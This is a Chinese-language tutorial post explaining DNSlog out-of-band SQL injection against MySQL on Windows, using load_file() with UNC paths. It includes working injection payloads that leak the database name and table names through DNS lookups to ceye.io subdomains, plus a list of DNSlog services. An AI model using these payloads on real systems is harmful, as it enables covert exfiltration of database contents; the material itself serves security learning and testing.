DNS注入并不是对DNS服务器进行注入,而是利用DNS在解析的时候会留下有用的日志,简称:DNS log注入。
0x00原理
首先需要一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名ceye.io的nameserver为自己的服务器A,然后在服务器A上配置好DNS server,这样以来所有ceye.io及其子域名的查询都会到服务器A上,这时就能够实时地监控域名查询请求了。
那么上面说的这些和我们这个DNS log注入有什么关系,DNS在解析的时候会留下记录,然后我们来读取这个多级域名的解析日志来获取我们所想要的内容
0x01实现条件
1、SQL盲注、无回显的命令执行、无回显的SSRF
2、只能用于windows系统
3、需要用到mysql中的load_file()函数,在Mysql中,load_file()函数读取一个文件并将其内容作为字符串返回。(不绝对,仅仅只是列举了mysql数据库的函数)
查看load_file()可以读取的磁盘是哪些;命令
show variables like '%secure%';
①当secure_file_priv为空,就可以读取磁盘的目录。
②当secure_file_priv为D:\,就可以读取D盘的文件。
③当secure_file_priv为null,load_file就不能加载文件。
在mysql命令下执行命令:
select load_file('\\\\helloworld.****.ceye.io\\aaa');
notice:
①hellworld这个参数是后续需要编写查询代码,现在仅是测试DNSlog平台查询情况;
②为什么出现的“\”都是成对出现?答:双斜杠表示网络资源路径,多加两个“\”就是转义了反斜杠;
③后面的aaa我这边测试是必须加上,可以不是aaa,阿猫阿狗都行;这样DNS才能查询,具体原因没有细查,欢迎留言讨论。
④问:为什么DNSlog注入只能用于windows系统。答:load_file()函数在Linux下是无法用来做DNSLog攻击的,因为linux没有UNC这个东西,所以当MySQL处于Linux系统中的时候,是不能使用这种方式外带数据的。
难一点的语句:
①load_file(concat('\\\\',(select database()),'xxx.ceye.io\\aaa'))
②' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='xxxx' limit 0,1),'.XXXX.ceye.io\\aaa'))),1,1)--+
concat()函数,用来拼接字符串的;
附加内容:
补充:
看了一些网上面的关于DNSlog注入的文章,都是比较全面充足的,如果我摘抄过来的话也没什么意思,就大概介绍下DNSlog注入入门级的使用吧,更多的是熟悉注入新姿势;因为DNSlog注入并不仅仅只是适用于mysql数据库的,其他数据库的利用我这边就没有罗列出来,如果有需要的话可以参考文章下方的参考链接。
先写这么多,后续再补充。
DNS平台:
http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io
参考链接:
https://www.anquanke.com/post/id/98096
https://www.cnblogs.com/afanti/p/8047530.html
